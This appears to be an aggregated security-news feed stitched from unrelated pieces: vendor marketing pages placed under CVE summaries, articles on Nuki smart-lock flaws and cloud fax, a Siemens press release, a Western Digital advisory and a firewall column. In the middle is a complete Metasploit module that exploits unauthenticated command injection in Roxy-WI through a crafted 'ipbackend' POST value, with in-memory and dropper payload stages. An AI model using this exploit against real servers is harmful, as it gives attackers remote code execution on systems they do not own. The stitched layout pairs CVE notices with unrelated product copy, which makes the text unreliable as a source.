InMailX Outlook Plugin < 3.22.0101 is vulnerable to Cross Site Scripting (XSS). InMailX Connection names are not sanitzed in the Outlook tab, which allows a local user or network administrator to execute HTML / Javascript in the Outlook of users.

**Enterprise Email Management, Compliance and Productivity Solution**

**inMailX** is an enterprise email management, compliance and productivity solution for Microsoft Outlook and Office 365, which provides the functionality and tools users need to effectively manage their emails and attachments.  inMailX integrates seamlessly with records and document management systems, cloud and network folder structures, helping users improve their email filing compliance.

With inMailX staff can improve their emails and attachments management compliance, productivity and the quality of work, while maintaining focus and reducing operational errors.  inMailX substantially enhances existing Outlook functionality and provides users with the ability to:

 - Manage emails and attachments using a simple and efficient interface  
 - Preview attachments when composing emails to ensure they are correct  
 - Clean metadata from Word, Excel PowerPoint, PDF and Image attachments  
 - Convert attachments to PDF 'on the fly' and prompt users to convert on send  
 - Combine, bookmark and secure multiple attachments into a single PDF  
 - Password protect Word, Excel PowerPoint and PDF attachments  
 - Rename and Reorder email attachments 'on the fly'  
 - Compress and secure attachments into ZIP while composing emails  
 - Save paper by printing only the most recent email conversation threads  
 - Print email body and attachments selectively and simultaneously  
 - Schedule follow-up tasks/appointments when filing or sending emails  
 - Reduce repetitive typing and quickly compose standard emails with content manager  
 - File emails into records and document management systems, network or cloud repositories

Its user interface is simple and intuitive, and it has been designed to combine most common tasks, such as 'Send, File & Print', 'Close, File & Print' or 'Attachments Preview, Clean, PDF, Protect, Rename, Reorder', into simple one-click actions.  Digitus has developed several inMailX modules that can be purchased separately or bundled in two cost effective suites_, inMailX Standard_ and _inMailX Professional__._

> **inMailX Standard** includes the following modules**:**
> 
> *   _Attachment Manager  
>     _
> *   _Content Manager  
>     _
> *   __Print Manager  
>     __
> 
> **inMailX Professional** includes the following modules**:**
> 
> *   _Email Manager  
>     _
> *   _Attachment Manager  
>     _
> *   _Content Manager  
>     _
> *   _Print Manager  
>     _
> *   _Time Manager  
>     _
> *   _Brand Manager  
>     _

**inMailX scales easily to meet the needs of any organisation, and it brings teams productivity to new levels.** 

**As new users are created, they automatically receive enhanced email management functionality, efficient attachments Preview, Clean, PDF, Protect, ZIP, Rename and Reorder tools, global quick text content, personalised email signatures and standardised corporate forms, so that they can immediately become productive.** 

**Integration with third party electronic documents and records management systems**

When used with its optional connectors for document/records management and file system integration, inMailX enhances Microsoft Outlook capabilities to file emails into third party document/records management systems, such as: iManage Work/Worksite, Micro Focus/HPE Content Manager, NetDocuments, SharePoint, Worldox, WebDAV (Oracle UCM, WebDAV Repositories, etc.), Cloud Stores or Network Folders (Box, Dropbox, GoogleDrive, OneDrive, MYOB Accountants Enterprise, MYOB Insolvency, APS Folders, etc.).

By integrating directly into Microsoft Outlook, inMailX allows staff to take control over managing their emails without losing any of the existing Outlook functionality. To find out more, click here.

**Save time, Reduce costs, Increase productivity**

With inMailX, organisations will ensure that their staff are able to maintain their sent and received emails organised, that email attachments can easily be previewed, cleaned, converted to PDF, reanmed and reordered, and that paper wastage is reduced by being able to truncate email printing and selectively print attachments.

In addition, organisations will improve their email branding by being able to centrally deploy and maintain standardised corporate email forms and signatures which are integrated Exchange Global Address List and Active Directory.

Since inMailX is extremely intuitive, it allows users to take advantage of its benefits with minimal training, and without delay. This translates into saving valuable time, reduced running costs, and increased productivity.

**Any organisation, regardless of its size, using Microsoft Outlook, will benefit from inMailX' High Return on Investment.**

**Contact us for a free inMailX demonstration, and discover the power of inMailX today!**

  
inMailX, inDocX, LawConnect, DigitusNet, iDigitus, Digitus are registered trademarks of Digitus Information Systems Pty Ltd in Australia and in some other countries. All third-party trademarks are the property of their respective owners.

CVE-2022-27105: inMailX | Digitus Information Systems

By Deeba Ahmed
Researchers have identified as many as eleven critical vulnerabilities in different versions of Nuki Smart Locks. The IT…
This is a post from HackRead.com Read the original post: Critical Vulnerabilities Exposed Nuki Smart Locks to a Plethora of Attack Options

****Researchers have identified as many as eleven critical vulnerabilities in different versions of Nuki Smart Locks.****

The IT security researchers at Manchester, England-based NCC Group have released a technical advisory explaining how Nuki Smart Locks were vulnerable to a plethora of attack possibilities.

It is worth noting that Nuki Home Solutions is a Graz, Austria-based supplier of smart home solutions in Europe. Here is a detailed overview of the eleven flaws in Nuki’s locks.

**Lack of Certificate Validation on TLS Communications**

This flaw is tracked as CVE-2022-32509 and affects Nuki Smart Lock version 3.0. As per the NCC Group research, the company didn’t implement SSL/TLS certificate validation on its Smart lock and Bridge devices. Without SSL/TLS certificate validation, attackers can perform man-in-the-middle attacks and access network traffic sent through an encrypted channel.

**Stack Buffer Overflow Parsing JSON Responses**

Tracked as CVE-2022-32504, this vulnerability affects Nuki Smart Lock 3.0. The issue can allow an attacker to get arbitrary code execution privilege on the device. The flaw is found in the code that implements the JSON objects parsing received from the SSE WebSocket, leading to a stack buffer overflow.

**Stack Buffer Overflow Parsing HTTP Parameters**

As per NCC Group’s technical writeup, the code responsible for overseeing the HTTP API parameter parsing logic causes a stack buffer overflow. It could be exploited to perform arbitrary code execution. This flaw is tracked as CVE-2022-32502 and was discovered in Nuki Bridge version 1.

**Broken Access Controls in the BLE Protocol**

The flaw is tracked as CVE-2022-32507 and affects Nuki Smart Lock 3.0. Research revealed that inadequate access control measures were used in the Bluetooth Low Energy Nuki API implementation, which could allow users to send out high-privilege commands to the Keyturner without being authorized for it.

1.  The Most Commonly Hacked Smart Home Tech
2.  Hackers can unlock a smartphone with fingerprints on glass of water
3.  Smart Lock vulnerability can give hackers full access to Wi-Fi network
4.  Hackers can clone your lock keys by recording clicks from smartphone
5.  Vulnerable smart alarms allowed hackers to track & turn off car engine

**TAG Exposed via Test Points**

This flaw is classified as CVE-2022-32503 and impacts Nuki Keypad. The TAG Exposed issue exposed the JTAG hardware interfaces on the affected devices.

Exploiting this flaw can allow an attacker to use the JTAG boundary scan feature to control code execution on the processor, debug the firmware, and read/alter the internal/external flash memory content. However, the attacker must have physical access to the circuit board to exploit the scan feature.

**Sensitive Information Sent Over an Unencrypted Channel**

This vulnerability is assigned CVE-2022-32510 and impacts Nuki Bridge version 1. The Bridge exposes the HTTP API using an unencrypted channel to access an administrative interface. The attacker can passively gather communication between the HTTP API and a client after accessing any device connected to the local network. A malicious actor can conveniently impersonate a legit user and access the full set of API endpoints.

**WD Interfaces Exposed via Test Points**

Tracked as CVE-2022-32506, the flaw exposed SWD hardware interfaces and was identified in Nuki smart lock 3.0. The attacker can use the SWD debug feature after having physical access to the circuit board, control the processor’s code execution, and debug the firmware.

SWD test points exposed (Image: Ncc Group)

**Denial of Service via Unauthenticated HTTP API Messages**

This flaw is classified as CVE-2022-32508 and impacts Nuki Bridge version 1. The flaw made devices vulnerable to denial of service (DoS) attacks if the attacker used specially crafted HTTP packets. Thus, impacting access to the Bridge and rendering the device unstable.

**Denial of Service via Unauthenticated BLE packets**

Tracked as CVE-2022-32505, this flaw made the impacted devices vulnerable to DoS attack through specially crafted Bluetooth Low energy packets. This could affect Keyturner’s availability and make the device unstable. Most BLE characteristics were found to be vulnerable to this issue.

**Insecure Invite Keys Implementation**

This flaw impacts the Nuki Smart Lock app version 2.22.5.5 (661). The invite token created for identifying a user during an invitation process is used to encrypt/decrypt the invite keys on the Nuki servers. A threat actor can easily take full control of the servers through this flaw and leak sensitive data.

**Opener Name Could Be Overwritten Without Authentication**

The Nuki Opener is impacted by this vulnerability that emerged from an insecure Opener Bluetooth Low energy implementation, allowing malicious actors to change the BLE device name. The device allowed an unauthenticated attacker to change the BLE device name.

**Current status**

The NCC Group informed Nuki about these flaws on 20th April 2022, and the company quickly responded. On 6th May 2022, Nuki contacted NCC Group regarding the progress on fixes. On 9th June 2022, patches were released for all vulnerabilities, after which NCC Group released a technical advisory.

Critical Vulnerabilities Exposed Nuki Smart Locks to a Plethora of Attack Options

This Metasploit module exploits an unauthenticated command injection vulnerability in Roxy-WI versions prior to 6.1.1.0. Successful exploitation results in remote code execution under the context of the web server user. Roxy-WI is an interface for managing HAProxy, Nginx and Keepalived servers.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Roxy-WI Prior to 6.1.1.0 Unauthenticated Command Injection RCE',        'Description' => %q{          This module exploits an unauthenticated command injection vulnerability in Roxy-WI          prior to version 6.1.1.0. Successful exploitation results in remote code execution          under the context of the web server user.          Roxy-WI is an interface for managing HAProxy, Nginx and Keepalived servers.        },        'License' => MSF_LICENSE,        'Author' => [          'Nuri Çilengir <nuri[at]prodaft.com>', # Author & Metasploit module        ],        'References' => [          ['URL', 'https://pentest.blog/advisory-roxywi-unauthenticated-remote-code-execution-cve-2022-3113/'], # Advisory          ['URL', 'https://github.com/hap-wi/roxy-wi/security/advisories/GHSA-53r2-mq99-f532'], # Additional Information          ['URL', 'https://github.com/hap-wi/roxy-wi/commit/82666df1e60c45dd6aa533b01a392f015d32f755'], # Patch          ['CVE', '2022-31137']        ],        'DefaultOptions' => {          'SSL' => true,          'WfsDelay' => 25        },        'Platform' => %w[unix linux],        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],        'Targets' => [          [            'Unix (In-Memory)',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :in_memory            }          ],          [            'Linux (Dropper)',            {              'Platform' => 'linux',              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :dropper            }          ]        ],        'CmdStagerFlavor' => ['printf'],        'DefaultTarget' => 0,        'Privileged' => false,        'DisclosureDate' => '2022-07-06',        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS]        }      )    )    register_options(      [        Opt::RPORT(443),        OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/'])      ]    )  end  def execute_command(cmd, _opts = {})    return send_request_cgi(      {        'method' => 'POST',        'uri' => normalize_uri(target_uri.path, 'app', 'options.py'),        'vars_post' => {          'serv' => '127.0.0.1',          'ipbackend' => "\"; #{cmd} ;#",          'alert_consumer' => Rex::Text.rand_text_alpha_lower(7),          'backend_server' => '127.0.0.1'        }      }, 10    )  rescue Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Errno::ETIMEDOUT    return nil  end  def check    print_status("Checking if #{peer} is vulnerable!")    res = execute_command('id')    return CheckCode::Unknown("Didn't receive a response from #{peer}") unless res    if res.code == 200 && res.body =~ /uid=\d+$.+$/      print_status("#{peer} is vulnerable!")      return CheckCode::Vulnerable('The device responded to exploitation with a 200 OK and test command successfully executed.')    elsif res.code == 200      return CheckCode::Unknown('The target did respond 200 OK response however it did not contain the expected payload.')    else      return CheckCode::Safe("The #{peer} did not respond a 200 OK response and the expected response, meaning its not vulnerable.")    end  end  def exploit    print_status('Exploiting...')    case target['Type']    when :in_memory      execute_command(payload.encoded)    when :dropper      execute_cmdstager    end  endend

Roxy-WI Remote Command Execution

Company joins AWS Partner Network to provide customers with industrial cybersecurity solution to ensure reliable electricity and fuel supplies.

*   Siemens Energy joins the AWS Partner Network as a Technology Partner to provide customers with industrial cybersecurity, analytics, and storage solutions
*   Siemens Energy’s AI-driven Managed Detection & Response (MDR) solution is a first-of-a-kind security offering available in AWS Marketplace built for energy and utilities, by an integrated energy technology company focused across the entire energy value chain
*   MDR’s monitoring and detection insights provide scalable protection against disruptive cyberattacks in the energy sector using innovative artificial intelligence

Siemens Energy Inc, one of the world’s leading energy technology companies, announces it is joining the Amazon Web Services (AWS) Partner Network (APN), a global community of partners that leverage programs, expertise, and resources to build, market, and sell customer offerings.

This expanded relationship includes listing Siemens Energy’s Managed Detection and Response (MDR) industrial cyber security solution in AWS Marketplace, a digital catalog that makes it easy for customers to find, compare, and immediately start using the software and services that run on AWS. This MDR security offering in AWS Marketplace is built for energy and utilities, by an integrated energy technology company focused across the entire energy value chain. As energy companies strive to protect physical infrastructure from escalating cyber threats, Siemens Energy’s MDR on AWS reduces the cost and technical barriers to achieving strong, fast, comprehensive cyber defense.

Expanding access to state-of-the-art cybersecurity is essential to ensuring reliable electricity and fuel supplies. Cyber risks to infrastructure are escalating amid the ongoing transition toward renewable and low-carbon energy sources and the accompanying expansion of digital devices in the energy sector. Siemens Energy’s MDR will help customers leverage analytics to secure their infrastructure while reducing costs, improving efficacy, and reducing emissions.

Siemens Energy’s industrial monitoring and detection solution defends critical infrastructure against cyberattacks, helping protect communities around the world from supply chain disruptions. AWS’s capabilities allow MDR’s technology to quickly collect and analyze large volumes of data to monitor for cyber threats, giving energy sector chief information security officers (CISOs) the power to detect and uncover attacks before they execute.

Secure cloud capabilities that can integrate digital applications and leverage sensitive data – such as real-time monitoring and detection – add an important and cost-effective tool to the defensive arsenal for CISOs and industrial security analysts.

“The energy transition relies on seamlessly connecting physical assets with digital technologies to foster innovation, reduce emissions, and improve efficiency, but this future depends on strong cybersecurity across the whole supply chain,” said Leo Simonovich, Vice President and Global Head of Industrial Cyber, Siemens Energy. “Siemens Energy’s AI-driven industrial cyber monitoring and detection platform is purpose-built to help CISOs identify, prevent, and mitigate cyber threats to the energy sector’s digital business model. Energy companies at every scale can now access and integrate advanced cyber threat detection across their operating environment, leveraging AWS’s secure cloud platform to build and defend the foundation of a digital energy ecosystem.”

Siemens Energy Takes Next Step to Protect Critical Infrastructure

The fax is dead. Long live the online fax? A new study suggests many healthcare professionals believe that flaws in today’s web security landscape are prompting a return to what’s been deemed an “extr

The fax is dead. Long live the online fax?

A new study suggests many healthcare professionals believe that flaws in today’s web security landscape are prompting a return to what’s been deemed an “extremely” secure medium: fax.

Published earlier this month, eFax research surveyed 1,000 IT and business decision-makers in the UK and Europe.

According to the report (PDF), 62% of respondents in the healthcare sector said that security was the major reason for a “migration” to cloud-based fax systems, and 21% of those surveyed believe that digital fax systems are “extremely” secure.

**What is ‘cloud fax’?**

Cloud faxing removes the need for on-premise equipment on both sides of a transmission. The gist is that users can send a fax quickly, via an online service, to be viewed and/or printed by the recipient.

Among fax users in healthcare, 37% of respondents said they use “cloud-based fax” systems, while 21% use both cloud and traditional faxing.

The research is the work of eFax, a company that uses the slogan: “The fast & easy way to send and receive faxes by email”.

It’s interesting, then, that the company’s own research says: “One of the main problems with email is its increasing vulnerability to interception, hacking, and fraud.”

“eFax is an internet fax service that eliminates the need for a fax machine, extra fax line, and all the associated expenses,” the company says. “Get a real local or toll-free fax number to send and receive faxes as email attachments. Online faxing is more reliable, secure, and convenient than analog fax machines.”

**Blurred lines**

When you send a test eFax ‘fax’, you receive an ‘incoming’ fax email with a PDF attached. Faxes can be sent to a phone number or online assignment number and can be accessed via email, the eFax portal, mobile app, or a standard fax machine.

Overall, a third of respondents (37%) said fax usage was likely to increase in the future – but 35% also said there might be a decrease.

However, while eFax appears to be trying to separate email and fax security, the line between what can be considered a fax message, or just an email, has been blurred.

Read more of the latest email security news

Traditional fax machines were considered secure in the past as they were ‘dumb’, internet connections were dial-up or nothing, and contained limited, analog functionality.

But the moment you connect a fax ‘number’ to a digital channel – whether this is an online portal accessed through a browser, email account, or app – there is always a risk of compromise.

When the study was published, Scott Wilson, vice president of sales and service at eFax, commented:

It’s clear that email is the established and widely accepted format for most communications, but it’s flawed and vulnerable to interception and hacking. Cloud faxing is more secure than email not least because fax infrastructure has limited exposure to the internet and internet-connected devices.

**‘Encryption is king’**

Using a fax number to send a message rather than an email address might not be traceable to a specific company department or user, and so could mitigate the risk of targeted attacks.

Sending a document directly to a physical fax machine, too, might have some perceived advantages – but it does not take away the risks of its underlying, digital infrastructure.

When asked by _The Daily Swig_ how eFax differs from standard email, and what security or encryption measures are in place, the eFax did not respond. (The firm’s help center, however, does mention TLS and some form of encryption.)

Simon Mullis, CTO of Venari Security, commented: “Cloud-based fax systems are a resourceful way to ensure the secure communication of confidential information, but for most encryption will be king.

“With 25% of healthcare organizations saying they rely on email encrypted software, it’s important to recognize the role of end-to-end encryption in ensuring higher levels of security and privacy, while also remaining compliant of regulations like GDPR.”

Cloud fax services can be quicker, cheaper, and more convenient for businesses that don’t want to rely on analog lines. However, the jury’s out on whether digital ‘faxes’ are any more, or less, secure than email – especially when both would depend on the implementation of basic security measures such as end-to-end encryption.

**YOU MIGHT ALSO LIKE** Zero-day flaws in GPS tracker pose surveillance, fuel cut-off risks to vehicles

Cloud fax company claims healthcare pros are ditching email for ‘more secure’ fax

Open redirect vulnerability in Booked versions prior to 3.3 allows a remote unauthenticated attacker to redirect a user to an arbitrary web site and conduct a phishing attack by having a user to access a specially crafted URL.

**Ditch the sign up sheets**

Booked is a simply powerful scheduling solution for any organization

**Simple to use**

Click a time, add some details. Reservation complete.

**Powerfully configurable**

Booked is built to work in any way your organization works.

**Multilingual**

Almost 40 languages and locales supported right out of the box.

**Beautiful on desktop**

Easily view availability and book time slots with a click

**Beautiful on mobile**

Mobile optimized scheduling to make managing your reservations simple

**No strings attached**

Booked Scheduler is now a fully-hosted solution. Nothing to download. Nothing to manage. We handle the installation, security, and maintenance of the hardware and software, freeing you to focus on your organization.

**Unlimited** users, schedules, and resources for just **$12** per month with an annual agreement. Seriously.

**For Schedule Administrators**

*   No technical background needed
*   Configure Booked to your needs
*   Early access to latest features
*   All of the benefits of an on-site installation with none of the hassles

**For System Administrators**

*   Nothing to install in your environment
*   Unlimited professional support
*   Keep your domain name or use ours
*   Zero maintenance – always up to date with automatic upgrades

**Ready to get started?**

Try out the live demo or sign up for a free trial of Booked Scheduler.

CVE-2022-30706: Booked – Simply Powerful Scheduling

The Western Digital My Cloud Web App [https://os5.mycloud.com/] uses a weak SSLContext when attempting to configure port forwarding rules. This was enabled to maintain compatibility with old or outdated home routers. By using an "SSL" context instead of "TLS" or specifying stronger validation, deprecated or insecure protocols are permitted. As a result, a local user with no privileges can exploit this vulnerability and jeopardize the integrity, confidentiality and authenticity of information transmitted. The scope of impact cannot extend to other components and no user input is required to exploit this vulnerability.

**WDC Tracking Number:** WDC-22011  
**Product Line:** My Cloud  
**Published:** July 25, 2022

**Last Updated:** July 25, 2022

**Description**

My Cloud OS 5 Firmware 5.23.114 includes updates to help improve the security of your My Cloud OS 5 devices.

To take advantage of the latest security fixes, Western Digital recommends that users promptly update their devices to the latest firmware by clicking on the firmware update notification.

**Product Impact**

**Minimum Fix Version**

**Last Updated**

My Cloud PR2100

5.23.114

July 22, 2022

My Cloud PR4100

5.23.114

July 22, 2022

My Cloud EX4100

5.23.114

July 22, 2022

My Cloud EX2 Ultra

5.23.114

July 22, 2022

My Cloud Mirror G2

5.23.114

July 22, 2022

My Cloud DL2100

5.23.114

July 22, 2022

My Cloud DL4100

5.23.114

July 22, 2022

My Cloud EX2100

5.23.114

July 22, 2022

My Cloud

5.23.114

July 22, 2022

WD Cloud

5.23.114

July 22, 2022

For more information on the latest security updates, see the release notes.

**Advisory Summary**

Western Digital My Cloud Web App uses a weak SSLContext when attempting to configure port forwarding rules. This was enabled to maintain compatibility with old or outdated home routers. As a result, a local user with least privileges can exploit this vulnerability and jeopardize the integrity, confidentiality and authenticity of information transmitted. This vulnerability was resolved by enabling TLS ConnectionSwitching to a "TLS" context instead of "SSL".

Addressed an improper input validation and out-of-bounds write vulnerability in TensorFlow which is an open-source platform for machine learning. An attacker could pass negative values to cause a segmentation fault-based denial-of-service attack. Certain components also did not validate input arguments which could also trigger a denial-of-service attack.

**CVE Number:**  CVE-2022-29191,  CVE-2022-29213,  CVE-2022-29208

Addressed multiple FFmpeg vulnerabilities by updating the version to 7:4.1.9-0+deb10u1.

Western Digital My Cloud devices were vulnerable to a cross-site scripting vulnerability that could allow an attacker with elevated privileges to access drives being backed up, to construct and inject JavaScript payloads into an authenticated user's browser. As a result, it may be possible to gain control over the authenticated session, steal data, modify settings, or redirect the user to malicious websites. This was resolved by output sanitization.

**CVE Number:**  CVE-2022-22999

CVE-2022-23000: WDC-22011 My Cloud Firmware Version 5.23.114 | Western Digital

Authenticated WordPress Options Change vulnerability in Biplob Adhikari's Flipbox plugin <= 2.6.0 at WordPress.

CVE-2022-33969: Changeset 2648808 – WordPress Plugin Repository

Cross-Site Request Forgery (CSRF) vulnerability in Sygnoos Popup Builder plugin <= 4.1.11 at WordPress allows an attacker to update plugin settings.

CVE-2022-29495: Popup Builder – Create highly converting, mobile friendly marketing popups.

Understanding the limitations of firewalls is important to protecting the organization from evolving threats.

Firewalls were born in the 1990s, alongside Windows 95 and Internet Explorer. They've been a staple of network security since, which prompts the question: Are firewalls still relevant? The determining factor is whether firewalls have grown with the changes we've seen in technology or if they've just stayed in line with the technology of the 1990s and early 2000s.

**How Firewalls Work & How They Don't**

Firewalls work primarily on the principle of deep packet inspection. Data packets are the units of information that constitute any type of Internet traffic, including Web traffic. They protect networks by checking the payload of every data packet trying to enter or leave a network and blocking any packets that contain malicious content. Content typically is defined as malicious through a series of rather complex policies and rules.

Today, data is almost always encrypted. Encryption ensures that good incoming and outgoing traffic is protected from prying eyes, but, unfortunately, it also hides bad incoming and outgoing traffic. Some firewalls can de-encrypt data packets, check their payload, and then re-encrypt them, but this process is computationally intensive and can bog down the network significantly. Also, this process is not always an available option given how many modern security protocols block the types of man-in-the-middle operations required for full-blown SSL inspection.

**Leveraging IP Addresses**

Indeed, deep packet inspection is becoming an antiquated security practice, but there are other ways to identify whether specific activity is malicious.

For example, some organizations blacklist malicious Web domains, then automatically block traffic from those sites, while others use tactics such as SIEM log analysis. However, these types of monitoring and alert systems are reactive: They tell you that you've been attacked, but don't block the malicious traffic that can cause an attack.

I staunchly believe in multifaceted security, with a simple set of three starting points:

1.  Don't reuse passwords.
2.  Regularly update your software.
3.  Use the truest lowest-common-denominator of Internet traffic — the IP address itself — to your advantage, as a key foundational tenet of your cyber security stack.

It's the third leg of that stool that can help ensure that your organization achieves a proactive posture when it comes to malicious traffic.

Since all traffic is identified by a unique IP address, focusing on IP is a simple way to identify and block any packets coming from or going to known malicious sources — without ever needing to check their contents. It doesn't matter if the data being transferred is encrypted or not.

Surprisingly to some, firewalls can't and don't perform this function very well because you need a very different hardware and software architecture to achieve deep packet inspection versus achieving IP filtering at scale.

**Conclusion**

While firewalls are a very important tool in organizations' security arsenals, it's important to align security solutions with security threats. As cyberattacks evolve, organizations should consider the kinds of tools that will be needed to complement and shore up firewall protection.

Tag

#ssl